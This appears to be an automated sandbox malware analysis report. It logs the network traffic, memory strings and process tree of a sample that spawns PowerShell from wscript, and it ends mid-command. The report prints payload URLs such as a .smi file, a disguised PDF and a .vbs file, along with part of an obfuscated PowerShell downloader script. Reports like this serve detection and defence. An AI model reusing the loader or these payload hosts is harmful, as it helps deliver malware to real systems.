          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 148.251.114.233 148.251.114.233
          Source: Joe Sandbox ViewASN Name: SERVERPLAN-ASIT SERVERPLAN-ASIT
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.almrwad.comConnection: Keep-Alive
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /wh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.fornid.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /na/mg.vbs HTTP/1.1Host: www.pineappletech.aeConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src="https://www.facebook.com/tr?id=&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
          Source: global trafficDNS traffic detected: DNS query: www.fornid.com
          Source: global trafficDNS traffic detected: DNS query: www.pineappletech.ae
          Source: global trafficDNS traffic detected: DNS query: www.almrwad.com
          Source: global trafficDNS traffic detected: DNS query: www.erp-royal-crown.info
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:39:25 GMTServer: ApacheP3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"Set-Cookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=rMDVJJyqzbUxb1uFCvyisiM0e%2FK268mtgB%2FbNpOhPhr4fxnTX%2FMSpEfZIoqrX%2BXqP6DO2Fqc%2BBFZkXxuDpMJZKAr8c7Z1ao6vEvWxyuOg1g%3D000074; expires=Wed, 25-Dec-2024 09:39:26 GMT; Max-Age=1728000; path=/; domain=www.fornid.com; httponlyUpgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:39:32 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:39:39 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:39:45 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:39:51 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:39:57 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:40:03 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:40:09 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:40:14 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:40:20 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:40:26 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:40:32 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:40:38 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:40:44 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:40:49 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:40:55 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:41:01 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:41:07 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:41:13 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F222D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21DFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F2170D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22247000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F220B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://almrwad.com
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://blog.fornid.com/
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F222D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F219EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22602000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F2170D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21E94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F220FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://erp-royal-crown.info
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD4965D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fornid.com
          Source: powershell.exe, 00000002.00000002.1599621623.000002CD57BF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1599621623.000002CD57D3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1428247268.000001B6547E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2646911553.0000022F31357000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2646911553.0000022F31214000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F213CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000005.00000002.1410489118.000001B644999000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD47B81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1410489118.000001B644771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F211A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000005.00000002.1410489118.000001B644999000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F222D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21DFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F2170D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22247000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F220B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.almrwad.com
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F213CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F222D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F219EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22602000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F2170D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21E94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F220FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.erp-royal-crown.info
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544764265.000002CD4965D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fornid.com
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fornid.com/
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fornid.com/content/13-international-shipments
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49AD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pineappletech.ae
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD47B81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1410489118.000001B644771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F211A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 00000005.00000002.1410489118.000001B644999000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1410489118.000001B645A83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
          Source: powershell.exe, 00000009.00000002.2646911553.0000022F31214000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000009.00000002.2646911553.0000022F31214000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000009.00000002.2646911553.0000022F31214000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Archivo
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Istok
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F213CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000002.00000002.1599621623.000002CD57BF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1599621623.000002CD57D3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1428247268.000001B6547E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2646911553.0000022F31357000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2646911553.0000022F31214000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F213CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F222D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21DFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F2170D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F220B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22AA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22220000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22AA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerendes78.smi
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F222D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22602000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F2170D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21E94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F220FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F213CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22AA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes78.smi
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49658000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/133-occhiali-protettivi
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544764265.000002CD4967E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/144-filtri-per-maschere
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544764265.000002CD4967E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/145-maschere-antigas
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoro
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544764265.000002CD4967E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/62-mascherine-protettive-ffp1-ffp2-ffp3
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/90-maschere-per-saldatura
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/cerca
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/contattaci
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/il-mio-account
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/img/logo.jpg
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/ordine
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/sitemap
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/themes/PRS070158/css/megnor/custom.css
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49658000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/wh/List
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49658000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544764265.000002CD491B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdf
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD491B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/wh/List%20of%20rualquiruald%20itualms%20and%20sualrvicuals.pdf
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49808000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pineappletech.ae
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49808000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pineappletech.ae/na/mg.vbs
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49808000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pinualapplualtualch.aual/na/mg.vbs
          Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
          Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
          Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
          Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
          Source: unknownHTTPS traffic detected: 93.95.216.175:443 -> 192.168.2.10:49728 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 91.193.42.13:443 -> 192.168.2.10:49741 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.171.244.231:443 -> 192.168.2.10:49754 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 148.251.114.233:443 -> 192.168.2.10:49784 version: TLS 1.2

          System Summary

          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh 